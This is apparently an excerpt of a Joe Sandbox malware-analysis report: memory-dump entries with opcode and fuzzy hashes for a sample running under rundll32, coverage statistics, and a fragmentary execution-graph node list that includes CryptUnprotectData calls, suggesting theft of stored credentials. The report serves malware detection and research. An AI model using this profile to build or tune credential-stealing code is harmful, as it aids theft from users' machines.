                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                • Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
                                                                • Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                • Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162917409.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5a00000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 02d4944b696b13444afb52f2255fa64a81b815edcc482088d3477d572720b54e
                                                                • Instruction ID: 9499d9ba1d60784189028a6cfef13a9cd44a431c7419eb3a729e62dc7af81be9
                                                                • Opcode Fuzzy Hash: 02d4944b696b13444afb52f2255fa64a81b815edcc482088d3477d572720b54e
                                                                • Instruction Fuzzy Hash: 19221834B012148FDB19DB38D958B6DB7F2BF89315F5484A8E50A9B3A1DB35ED82CB40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67c575242fa41d4c75dc1c2ec9cbb73a6193bb9d03ee6d23bf8cd34ef27c2e8e
                                                                • Instruction ID: 21cd5a8028d4738f9dbf320990dcae62a6e0ad23d94cc37ae43850ab190d108c
                                                                • Opcode Fuzzy Hash: 67c575242fa41d4c75dc1c2ec9cbb73a6193bb9d03ee6d23bf8cd34ef27c2e8e
                                                                • Instruction Fuzzy Hash: 82E14F31E1065A9FCB05DFA8D8405DEF7B2FF99310F25C65AE415BB210EB34A986CB90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f22fa388c5777111b864c7b2ac3880a2a5b691b500745aa3e76377ac55f9b4aa
                                                                • Instruction ID: a11039c7036df8a1c55d36e9c71aba224a721a25d2ee856e09eff1a59d4abb2f
                                                                • Opcode Fuzzy Hash: f22fa388c5777111b864c7b2ac3880a2a5b691b500745aa3e76377ac55f9b4aa
                                                                • Instruction Fuzzy Hash: 5F818B34B012159FDB249F64E968BAEBBB2FFC5701F108569E4069B384DB39EC45CB90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd891cd315f28dd74139f3d617548e07caee5bed85059c1c48aae8c60a7a7362
                                                                • Instruction ID: 6dcfdca34b419030bbfb6471ac208405706cf6aaf04ab30394354a14481284f1
                                                                • Opcode Fuzzy Hash: cd891cd315f28dd74139f3d617548e07caee5bed85059c1c48aae8c60a7a7362
                                                                • Instruction Fuzzy Hash: EB917D35A00616CFCB05DFB9D85459DBBB6FF88310B148699E809AF354EB34ED85CB90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a717bae1fd1421922df5333b03351638645739f48cb6e056ada83770bff31da0
                                                                • Instruction ID: f8b5107828c8b2e3e6fe32852a29d6103efbb4fa4d884eeb1d803d6e634ebfd9
                                                                • Opcode Fuzzy Hash: a717bae1fd1421922df5333b03351638645739f48cb6e056ada83770bff31da0
                                                                • Instruction Fuzzy Hash: AD715F35B00214DBEB159BB5C8586AEBAA7FFC9310F148069E506EB3A4DE74EC428B51
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54ec0690681a6977cd3ed0f6024c514b940f6b87746f65ba5631913e72bea7b5
                                                                • Instruction ID: e424a54a58c8618039119f2577f00e019194b7fe3d800de9cd600451a55b3876
                                                                • Opcode Fuzzy Hash: 54ec0690681a6977cd3ed0f6024c514b940f6b87746f65ba5631913e72bea7b5
                                                                • Instruction Fuzzy Hash: 9161E471D153998FDB02DFB8D8647CD7FB1EF96304F05819AD140AB292EB389849CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5c0ed2a6ee26741c9e98559178f38f548e4803228bd8f0fe0fbbe2865430c6da
                                                                • Instruction ID: 866bdecfd0a6244bf693d8bf720e774cf9e61b71e1ef96ac92cec1bc684a2906
                                                                • Opcode Fuzzy Hash: 5c0ed2a6ee26741c9e98559178f38f548e4803228bd8f0fe0fbbe2865430c6da
                                                                • Instruction Fuzzy Hash: A7518B356002018FDB16DF79D8A465EBBB6EF8931071585A9E845DF355DF34EC02CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3d3f90a9c4fb2866f0754dca762c08bc9e4912b396ae28c99236f48379a2dab
                                                                • Instruction ID: 131cf678d2cedf0694e91a46e2aab62678df0f1f444196615b18aae1ec83de55
                                                                • Opcode Fuzzy Hash: a3d3f90a9c4fb2866f0754dca762c08bc9e4912b396ae28c99236f48379a2dab
                                                                • Instruction Fuzzy Hash: 9851CF75A092949FDB01CF68D8A498DBFF1EF9A200B09409BE441DB362D638EC05CB65
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f27a6caad82fe4e193471ae0b0f2254a805e5eef86f68891d59e998ee079e08e
                                                                • Instruction ID: b550b83b120d012391244a3908a158903b77e9c2aaa6f7e615167341ea66f7a3
                                                                • Opcode Fuzzy Hash: f27a6caad82fe4e193471ae0b0f2254a805e5eef86f68891d59e998ee079e08e
                                                                • Instruction Fuzzy Hash: 3D51CD35B01209CFDB15DF78D8546AEBBF6FFC9350B14812AE905DB354EA30AC428BA0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f81d6e69797749a924450c551baaccea54f8eb450ae417804f169177e7ad3954
                                                                • Instruction ID: 3f94ef88ca55990889d0203d856a5b25829841f7f88dcd2292eda86ed2ed2934
                                                                • Opcode Fuzzy Hash: f81d6e69797749a924450c551baaccea54f8eb450ae417804f169177e7ad3954
                                                                • Instruction Fuzzy Hash: 10518D34E11249DFDB05DFB8D855BDDBBB2FF89300F108569E104AB281EB786844CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c26010711e9e572cbeb274fe32800ddefbd0eb27c0e3c6564aced6e682323abe
                                                                • Instruction ID: 23617c2d4f1bafbef79a23e762b2c53b4f2774ebfdacee7b9130cce3b4394716
                                                                • Opcode Fuzzy Hash: c26010711e9e572cbeb274fe32800ddefbd0eb27c0e3c6564aced6e682323abe
                                                                • Instruction Fuzzy Hash: 1D41ED317042149FEB199A79986477E3BABEBC5344F0484AAF406DB395EF38AD0187A0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 622a83b632bfd826c64b232aafe3f74ff89c1bfb3dad885b22a7cc01f036ea4c
                                                                • Instruction ID: 497eebb54c6f42bfc1137206f37a02ebfbb43b80d522672da55bf15da7d1ed4e
                                                                • Opcode Fuzzy Hash: 622a83b632bfd826c64b232aafe3f74ff89c1bfb3dad885b22a7cc01f036ea4c
                                                                • Instruction Fuzzy Hash: 1331FE317092515FDB059F3898647AE3BF6EFC6354F0444AAE041CB2D6EB34A80583A5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e39aad715ff9b820ab4a5042700729aae3e7f787082fbcb84632532465e3deb
                                                                • Instruction ID: f5af4a9d9c9fb98be38251643b1cf47761203f3e1449abe19ab6156339e22836
                                                                • Opcode Fuzzy Hash: 8e39aad715ff9b820ab4a5042700729aae3e7f787082fbcb84632532465e3deb
                                                                • Instruction Fuzzy Hash: 5231C236B001145FDF189E6998407BE77BAFBC4395F0444BAF50AD7294EB34AA4587A0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ae3d1388fbd652670f18692774678c184f2ca4524e2972270f5ef5033f350dd9
                                                                • Instruction ID: 79b12cbf0c76afd3163896aba4d310ef273590c6b7273b738df2bdf3a6c1b309
                                                                • Opcode Fuzzy Hash: ae3d1388fbd652670f18692774678c184f2ca4524e2972270f5ef5033f350dd9
                                                                • Instruction Fuzzy Hash: B101926291E3C8AFD7039B78E87528D3FB1CB97208B0548EBD684DB153D6246915C3A5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2161191493.000000000302D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0302D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_302d000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4c9fa10d4c9bdaeabed3ac2c4260b7c4600128ca19a1b42d36c27d95538cb2d8
                                                                • Instruction ID: 75128f426d96dcca34d863d614111457ec888cc017e14bc71a7a75858106c49b
                                                                • Opcode Fuzzy Hash: 4c9fa10d4c9bdaeabed3ac2c4260b7c4600128ca19a1b42d36c27d95538cb2d8
                                                                • Instruction Fuzzy Hash: 7C01696100E3D09FE7528B258C94762BFA8DF53224F0D84CBE8888F1A3C2689C45CB72
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c21ca9d0a60db6f8a368e8ecf441d271983ae7cdf44d01c490fa42364841cef0
                                                                • Instruction ID: 68acdc0f9cfbb6b5bd56e84df7296867c105a94033f7b716054aca9baa3dce90
                                                                • Opcode Fuzzy Hash: c21ca9d0a60db6f8a368e8ecf441d271983ae7cdf44d01c490fa42364841cef0
                                                                • Instruction Fuzzy Hash: F901A23170021897EB18EA6AC4657AF7AE7EFC9304F24807DD106B7390CE79AD058BD1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2161191493.000000000302D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0302D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_302d000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6702017cea31e14e3b35a25ac2395d70bca667397dbee26563ddbbe302ff576
                                                                • Instruction ID: 5c5b5d1cc053213053ef171d70250edc232bb003ae6dafafd5d07676537a4e46
                                                                • Opcode Fuzzy Hash: d6702017cea31e14e3b35a25ac2395d70bca667397dbee26563ddbbe302ff576
                                                                • Instruction Fuzzy Hash: 6301F23100A354EAE7508F25C9C4B66FFD8EF82364F0CC45AED684A292C678DC45CBB1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee9e9ca63a530e792b1824c7f097d5c2efd33edbeb82a5cf6ed68f7d82aa818e
                                                                • Instruction ID: 06706e8c6a05fff0b4d9b14a601464ff508bdb0266b6de1bb4a2372d9cec1d32
                                                                • Opcode Fuzzy Hash: ee9e9ca63a530e792b1824c7f097d5c2efd33edbeb82a5cf6ed68f7d82aa818e
                                                                • Instruction Fuzzy Hash: 0A01F430A063455FD7095FB578B911E3FE9EDC220130508BBD64ACF291EA28680D83F1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3cb003e80b92b898c6458706d9d356ce7df1d02ca51341c297f6a8164260dd4
                                                                • Instruction ID: 40acf82f07f05d4eb89fc6a9554b4cb7e5b81cc7614cd60fd56e5c877ee07678
                                                                • Opcode Fuzzy Hash: e3cb003e80b92b898c6458706d9d356ce7df1d02ca51341c297f6a8164260dd4
                                                                • Instruction Fuzzy Hash: 01F0BB74A012055FD7185FB5757955E3BEAEEC1351305083ED50ACF250EA35A80887E1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad3d5e89fbc6f9ac1d91741180058bee4cc0e7e1b925adcdbb0d1a52cd7dbc1a
                                                                • Instruction ID: d4a381490cd6ae9072f2acbfad469db217a5474affe847f5b6dbcef9c1fd6b0d
                                                                • Opcode Fuzzy Hash: ad3d5e89fbc6f9ac1d91741180058bee4cc0e7e1b925adcdbb0d1a52cd7dbc1a
                                                                • Instruction Fuzzy Hash: 0BF08231300204479322BA6EE89599BBBDEEBC5661300C52EF509DB304DFA5BC0187E0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4961c86a79960348e42c100636d76cfeafa1f517e75444714e0f5478966358f6
                                                                • Instruction ID: 4e84d584930a8f579dde84142afc563b311ff800f492025310f8cc06b79ac6d7
                                                                • Opcode Fuzzy Hash: 4961c86a79960348e42c100636d76cfeafa1f517e75444714e0f5478966358f6
                                                                • Instruction Fuzzy Hash: 2CF05C357053485FC3059A29E85064BBF6EDBCB364F5000FAE348CB266CD75AC02C790
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 28bb16c1919345f34adbd621496e0cf5bc289168738174d1f0882bdcd8da7be5
                                                                • Instruction ID: 8ba0fd6f65c18af6e3635c9795932bc1539d80a232461061e5cfec6c2b8d0554
                                                                • Opcode Fuzzy Hash: 28bb16c1919345f34adbd621496e0cf5bc289168738174d1f0882bdcd8da7be5
                                                                • Instruction Fuzzy Hash: 38F0E5307146540BFB2816669C0039A6B899FE67A8F4000FBF485DBA93E4C0F84613B2
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74009f4ce22f77444633f1b56a587e0d1a5d8cc98a75cdf94f6eac5653d19d98
                                                                • Instruction ID: c7b8f74326cc65eb4a7d1cebed9031d163c11bb961fa8e5c1d58e5a67d7b7132
                                                                • Opcode Fuzzy Hash: 74009f4ce22f77444633f1b56a587e0d1a5d8cc98a75cdf94f6eac5653d19d98
                                                                • Instruction Fuzzy Hash: 5BE0C2BF7491441FE721648E7891896AF28E2D21F930600BBF208CB102A452580392B4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54cc7dba33bade0fc2ec38fd84337336597cdb21e0b644d9a1388c4398d75df1
                                                                • Instruction ID: 2b5bd1e70424c60b90007af89b55822f891cd640cb7fdbcf09679cb0407691a8
                                                                • Opcode Fuzzy Hash: 54cc7dba33bade0fc2ec38fd84337336597cdb21e0b644d9a1388c4398d75df1
                                                                • Instruction Fuzzy Hash: CFE026367012084BC314A92AE84095BB79EEBC9228B1040B9E10CCB315CD76AC028A90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d6573c458f77d1f492b7407baf9daf618c20b692a87e583c3ce954a13acd5db
                                                                • Instruction ID: 365a7a28a1c4d63518e38bcbb5a9cba48fce0920b4b53a51d941da81998dae2e
                                                                • Opcode Fuzzy Hash: 6d6573c458f77d1f492b7407baf9daf618c20b692a87e583c3ce954a13acd5db
                                                                • Instruction Fuzzy Hash: BEE0927090524CEFDF01DB75E92118E7FB5DB86105B1048EAD444E7102EB30BE04D7A0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b513de989f9b39d9cbe2a05db1551211d4adf827b32ba1af8f8976bcc89f6d4
                                                                • Instruction ID: 4ae1c1f2b192ab0e0ba3c8bddbca7cbedd01fe3bd3248df02e641c86456ab078
                                                                • Opcode Fuzzy Hash: 1b513de989f9b39d9cbe2a05db1551211d4adf827b32ba1af8f8976bcc89f6d4
                                                                • Instruction Fuzzy Hash: 74D05E32A413149BEB1026AA14042EABBDCDF9A165F1544F7EE099B212A935AC0242F4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8534f767ed2c8bfa49003aab474bfc287ac588dc4606338bf2ab833a6a09bd41
                                                                • Instruction ID: 1f4d5f35eaee41bbc47b245267d1640667dc024cabcb0ef050c8e9571f57f34f
                                                                • Opcode Fuzzy Hash: 8534f767ed2c8bfa49003aab474bfc287ac588dc4606338bf2ab833a6a09bd41
                                                                • Instruction Fuzzy Hash: 92D02B3231E2085FC3069754E4068697FB8AB56120304006BF805CF262CD602C80C7D0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2c8d21e3ada7ff31571517ace6c7ad3ee932cbe8fb4104acbb803a1018daebf
                                                                • Instruction ID: 4a76b6bf526e34ac525597013f2567d53fc41aed1990528e3c27d1f83085e319
                                                                • Opcode Fuzzy Hash: b2c8d21e3ada7ff31571517ace6c7ad3ee932cbe8fb4104acbb803a1018daebf
                                                                • Instruction Fuzzy Hash: E0E0867090B249EFDB01DFB4E9615DDBFB4DB46204B1045EAD408DB243E9345F069751
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59f8832a341452443dbc54de9ea3975a84738c36143b87736f1ac91241044061
                                                                • Instruction ID: cf6880b97661851669d849873a70791cc9c19882b29cdad4f845c7f962fb8c76
                                                                • Opcode Fuzzy Hash: 59f8832a341452443dbc54de9ea3975a84738c36143b87736f1ac91241044061
                                                                • Instruction Fuzzy Hash: 77D0A73732511CAB52006619D85696E7BE9EBD53653104427FA0187210DD60BC419795
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9cc13f8c50ceaca79b326e4f316c86f4e9db4d862f210c331e8a1366915e3744
                                                                • Instruction ID: c09068cfeba8663d659a5c9da3c830adad3586bf21c478913491339fad1be6d5
                                                                • Opcode Fuzzy Hash: 9cc13f8c50ceaca79b326e4f316c86f4e9db4d862f210c331e8a1366915e3744
                                                                • Instruction Fuzzy Hash: 60D05EB0A0120CEFCB01EFB9E95559DBBFAEB49205B1089E9D408E7200EF316F009B90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e11373d4686e01da05daa84cabcfcdc6a4b39590638cd056798ea1a225f2a81d
                                                                • Instruction ID: 2b9ac248039c2f209ab7eeaea1a8aa6b9e0cb0abf02431a469409e55dab179d8
                                                                • Opcode Fuzzy Hash: e11373d4686e01da05daa84cabcfcdc6a4b39590638cd056798ea1a225f2a81d
                                                                • Instruction Fuzzy Hash: F6D05B7090610EEFCB00DFF8E95159DBBB5DB45204F1046EDD408D7301EA316F009790
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 869689b861b4d36a86ec7dbce9b230201363983a78961d50d7dd5468a7fa335c
                                                                • Instruction ID: fe7b829b9afd0a74e54e04fd53d9b9ace40c5c1c474879456a1267a71f3d334e
                                                                • Opcode Fuzzy Hash: 869689b861b4d36a86ec7dbce9b230201363983a78961d50d7dd5468a7fa335c
                                                                • Instruction Fuzzy Hash: DBC08CB67D5A002FEB018644AC866C9BB71EAB131834EC272E08182823C22D18138230

                                                                Execution Graph

                                                                Execution Coverage:14.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:2.9%
                                                                Total number of Nodes:442
                                                                Total number of Limit Nodes:28
51702 55bff30 2 API calls 51698->51702 51699 55bfc66 51699->51654 51700->51699 51701->51699 51702->51699 51704 5bf01e8 51703->51704 51705 5bf0232 51704->51705 51706 5bf0767 51704->51706 51709 5bf036e 51705->51709 51715 5bf01a2 3 API calls 51705->51715 51716 5bf01a0 3 API calls 51705->51716 51747 5bf07a8 51705->51747 51751 5bf0798 51705->51751 51707 5bf07cc 51706->51707 51759 51b74c8 51706->51759 51765 51b74a5 51706->51765 51707->51654 51708 5bf02be 51708->51709 51755 5bf0b51 51708->51755 51709->51654 51715->51708 51716->51708 51718 5bf01e8 51717->51718 51719 5bf0232 51718->51719 51720 5bf0767 51718->51720 51723 5bf036e 51719->51723 51727 5bf07a8 3 API calls 51719->51727 51728 5bf0798 3 API calls 51719->51728 51729 5bf01a2 3 API calls 51719->51729 51730 5bf01a0 3 API calls 51719->51730 51721 5bf07cc 51720->51721 51725 51b74c8 3 API calls 51720->51725 51726 51b74a5 3 API calls 51720->51726 51721->51654 51722 5bf02be 51722->51723 51724 5bf0b51 CryptUnprotectData 51722->51724 51723->51654 51724->51723 51725->51721 51726->51721 51727->51722 51728->51722 51729->51722 51730->51722 51732 55bff5e 51731->51732 51733 55bff41 51731->51733 51732->51693 51733->51732 51744 13bffb0 51733->51744 51734 55bffaa 51734->51693 51738 55bff1f 51736->51738 51737 55bff5e 51737->51693 51738->51737 51740 13bffb0 2 API calls 51738->51740 51739 55bffaa 51739->51693 51740->51739 51742 55bffaa 51741->51742 51743 13bffb0 2 API calls 51741->51743 51742->51693 51743->51742 51745 13beaa8 2 API calls 51744->51745 51746 13bffc0 51745->51746 51746->51734 51749 51b74c8 3 API calls 51747->51749 51750 51b74a5 3 API calls 51747->51750 51748 5bf07cc 51748->51708 51749->51748 51750->51748 51752 5bf07cc 51751->51752 51753 51b74c8 3 API calls 51751->51753 51754 51b74a5 3 API calls 51751->51754 51752->51708 51753->51752 51754->51752 51756 5bf0aee CryptUnprotectData 51755->51756 51758 5bf0b5e 51755->51758 51757 5bf0b1a 51756->51757 51757->51709 51761 51b74d5 51759->51761 51760 51b74e7 51760->51707 